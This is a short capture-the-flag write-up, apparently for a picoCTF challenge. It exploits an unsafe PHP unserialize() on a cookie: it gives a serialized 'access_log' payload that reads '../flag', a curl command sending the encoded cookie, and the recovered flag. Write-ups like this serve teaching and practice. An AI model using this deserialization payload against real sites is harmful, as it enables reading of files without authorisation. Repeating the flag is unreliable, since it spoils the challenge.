1. All steps are basically done in Burp Suite. I saw many writeups said that they have to go to `robots.txt`, see `/admin.phps` then found the source code is in `.phps` form, but idk why when opening the link in burp browser, the source code of `index.php` just pop up to me 🤷‍♂️. Anyways, we can see that there's `cookie.php` and `authentication.php`. These two link need to be appended with `s` so that we can view the source code. (More about `.phps`: https://stackoverflow.com/questions/41689479/what-is-the-file-extension-phps-and-what-is-it-used-for) 2. In `authentication.phps`, there's a line about `$perm` and `cookie.php` that give access to `admin`While in `cookie.phps`, we can see [php unserialization](https://hackmd.io/@nataliepjlin/rJ4cjvg2h) here 3. Since the file is stored in `../flag`, and files are accessed with `log_file`, as mentioned in `authentication.phps`.Our payload will be `O:10:"access_log":1:{s:8:"log_file";s:7:"../flag";}` 4. Since in `cookie.phps`, `$perm = unserialize(base64_decode(urldecode($_COOKIE["login"])));`, we have to base64 encode it then url encode it (using DECODER in burp) 5. Use [`curl` to send the cookie](https://curl.se/docs/http-cookies.html) (encoded payload) ```shell ┌──(kali㉿kali)-[~] └─$ curl mercury.picoctf.net:3449/authentication.php --cookie "login=%54%7a%6f%78%4d%44%6f%69%59%57%4e%6a%5a%58%4e%7a%58%32%78%76%5a%79%49%36%4d%54%70%37%63%7a%6f%34%4f%69%4a%73%62%32%64%66%5a%6d%6c%73%5a%53%49%37%63%7a%6f%33%4f%69%49%75%4c%69%39%6d%62%47%46%6e%49%6a%74%39" Deserialization error. picoCTF{th15_vu1n_1s_5up3r_53r1ous_y4ll_b4e3f8b1} ```